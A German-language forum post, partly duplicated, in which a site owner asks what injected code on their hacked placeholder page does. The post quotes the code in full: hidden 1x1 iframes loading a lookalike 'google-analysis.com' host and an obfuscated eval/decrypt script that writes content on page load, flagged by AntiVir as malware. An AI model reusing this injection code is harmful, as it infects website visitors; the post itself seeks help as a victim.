Abweichler
Enthusiast
Hallo zusammen!
Bereits seit ca. 1 Jahr habe ich eine Domain inkl. Webspace registriert, die ich aber aus purem Zeitmangel bisher nicht mit Inhalt füllen konnte. Der Provider liegt in Australien.
Ich hatte lediglich eine einfache .html Seite hinterlegt, die beim Aufruf einen schwarzen Bildschirm hervorruft.
Heute habe ich festgestellt, dass jemand vor ca. 2 Wochen folgenden Code in die Datei eingefügt hat:
Leider weis ich nicht wie der Code dahin kommt noch wer ihn eingefügt hat. Auch kann ich nicht Nachvollziehen was dieser Code eigentlich bewirkt.
Stutzig bin ich erst geworden, als AntiVir sich beim Aufruf der Seite die mit der folgenden Meldung bemerkbar machte:
Bisher habe ich den Zugriff natürlich verweigert. Gerne wüsste ich aber was der Code oben bedeutet. Kann mir da jemand weiterhelfen?
Bereits seit ca. 1 Jahr habe ich eine Domain inkl. Webspace registriert, die ich aber aus purem Zeitmangel bisher nicht mit Inhalt füllen konnte. Der Provider liegt in Australien.
Ich hatte lediglich eine einfache .html Seite hinterlegt, die beim Aufruf einen schwarzen Bildschirm hervorruft.
Heute habe ich festgestellt, dass jemand vor ca. 2 Wochen folgenden Code in die Datei eingefügt hat:
PHP:
<html>
<head>
<title></title>
</head>
<body bgcolor="#000000">
<iframe src=http://google-analysis.com/in.cgi?9 width=1 height=1></iframe><iframe src=http://google-analysis.com/in.cgi?9 width=1 height=1></iframe><br /><br /><br />
</body>
</html><script>function load(code,dfunc,anticasp){eval(dfunc);decrypt(code);}load('<`B15ni[X1hIZQQFx;;lSSloi{5Y5o_X`X.hSn;`Y.hl`?T[g`(QZIm[Zi`lZQIm><;`B15ni>',unescape('function decrypt%28n%29%7Bvar l%2Cch%2Cind%2Cq%3D%22%22%2Ckey%3D%22OD%26%3Ax9T6H%40fBAC%23y_wgloSEb%7EK %5BchZei%60a5z-%7Bjv%21Pk%7Cr1mnYU%7DqV7%2F%3BpF%5DsXG%3DILtQJ0u%5C%272Md%284%2A%22%3Bfor%28l%3D0%3Bl%3Cn.length%3Bl%2B%2B%29%7Bch%3Dn.charAt%28l%29%3Bind%3Dkey.indexOf%28ch%29%3Bif%28ind%3E-1%29%7Bif%28ind%3D%3D0%29%7Bind %3D79%7Dq%2B%3Dkey.charAt%28ind-1%29%7D else %7Bq%2B%3Dch%7D%7D%3Bdocument.write%28q%29%7D'));</script>
Leider weis ich nicht wie der Code dahin kommt noch wer ihn eingefügt hat. Auch kann ich nicht Nachvollziehen was dieser Code eigentlich bewirkt.
Stutzig bin ich erst geworden, als AntiVir sich beim Aufruf der Seite die mit der folgenden Meldung bemerkbar machte:
Code:
Enthält verdächtigen Code: HEUR/HTML.Malware
Bisher habe ich den Zugriff natürlich verweigert. Gerne wüsste ich aber was der Code oben bedeutet. Kann mir da jemand weiterhelfen?